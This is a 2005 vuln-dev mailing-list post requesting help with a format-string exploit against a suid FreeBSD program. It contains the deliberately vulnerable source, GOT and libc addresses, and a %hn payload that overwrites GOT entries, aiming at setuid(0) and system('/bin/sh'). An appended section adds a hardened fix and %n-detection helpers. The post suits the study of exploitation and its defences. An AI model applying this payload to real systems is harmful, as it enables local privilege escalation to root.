
List:       vuln-dev
Subject:    Format Strings nonexec heap/stack
From:       Alex <alex00882007 () gmail ! com>
Date:       2005-01-30 6:04:43
Message-ID: c912c14050129220445572e37 () mail ! gmail ! com

Hello, this is my first post. I hope it's in the list.

I am posting to get some help in developing an exploit for such a condition.

The environment:
FreeBSD machine, nonexec heap/stack. This is a suid binary, but is
not calling setuid().

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
        char *ptr;
        ptr = getenv("TERM");
        if (ptr)
            printf(ptr);    /* format string taken straight from the environment */
        printf("\n");
        exit(0);
}

objdump -R | grep printf
0804999c R_386_JUMP_SLOT   printf
objdump -R | grep exit
080499b0 R_386_JUMP_SLOT   exit

(gdb) p setuid
$1 = {<text variable, no debug info>} 0x280c1370 <setuid>
(gdb) p system
$2 = {<text variable, no debug info>} 0x28093a38 <system>



Using a format string it is possible to over-write the GOT entries for
printf() and exit().
I have been able to do so successfully. The problem is that it is not
enough to do just that, since it will become system("\n") or
system(0);

On FreeBSD, arguments are passed via pushing to the stack.
What I have been trying to do is this.

After rewriting the GOT entry for printf as that of setuid(), I want
to push a NULL byte onto the stack to call setuid(0);
The GOT entry for exit() has been replaced by that of system(). So
instead of pushing 0x0, I want to push a pointer to a "/bin/sh"
string.

Is this possible even? Or is there a better way of doing this?

To overwrite the GOT:
export TERM=` printf  \
"\x9c\x99\x04\x08\x9e\x99\x04\x08\xb0\x99\x04\x08\xb2\x99\x04\x08"`\
%.4960u%OFFSET\$hn%.5276u%OFFSET+1\$hn%.9628u%OFFSET+2\$hn%.60881u%OFFSET+3\$hn


where OFFSET = stackpop(?). Usually this is ~130 but it depends on how
your environmental variables are setup.

I'm not sure what I would do next in order to change the values that
are being pushed. Could someone help me with this?
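Added example, not part of Alex's post: the hardened form of the program above, which passes TERM as data to a fixed "%s" format, plus two hypothetical audit helpers that flag strings carrying conversion directives, in particular the %n family that the GOT overwrite relies on. The helper names are assumptions, not anything from the post.

```c
#include <stdio.h>
#include <string.h>

/* Hardened form of the posted program: the TERM value is passed as an
 * argument to a fixed "%s" format, never as the format string itself, so
 * any %n/%hn directives or positional "N$" references in it are printed
 * literally instead of being interpreted. */
void print_term_safely(const char *term)
{
    if (term)
        printf("%s", term);
    printf("\n");
}

/* Hypothetical audit helper: counts the conversion directives in a string
 * that untrusted input might hand to printf as a format; "%%" is a literal
 * percent sign and is not counted. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }   /* "%%" -> literal '%' */
        n++;
    }
    return n;
}

/* Hypothetical audit helper: returns 1 if the string carries a %n-family
 * directive (%n, %hn, %hhn, %130$hn, ...), the conversion that turns a
 * format-string bug into a memory write such as the GOT overwrite in the
 * post; returns 0 otherwise. */
int has_write_directive(const char *s)
{
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        p++;
        /* skip flags, width, precision and a positional "N$" prefix */
        while (*p && strchr("0123456789.$-+ #*", *p)) p++;
        /* skip length modifiers (h, hh, l, ll, q, j, z, t, L) */
        while (*p && strchr("hlqjztL", *p)) p++;
        if (*p == 'n') return 1;
        if (!*p) break;                       /* ended inside a directive */
    }
    return 0;
}
```

Running has_write_directive over a TERM value before a program like the one above ever reaches printf is the kind of check a reviewer or a test harness would add; the real fix remains the fixed "%s" format.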